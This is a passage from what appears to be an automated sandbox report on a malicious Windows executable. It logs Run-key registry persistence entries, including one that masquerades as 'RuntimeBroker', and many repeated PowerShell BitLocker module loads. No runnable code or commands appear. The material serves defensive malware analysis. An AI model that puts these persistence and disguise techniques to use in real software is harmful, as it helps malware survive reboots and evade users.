                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6caJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6caJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6caJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6caJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIiJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Loading BitLocker PowerShell Module
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
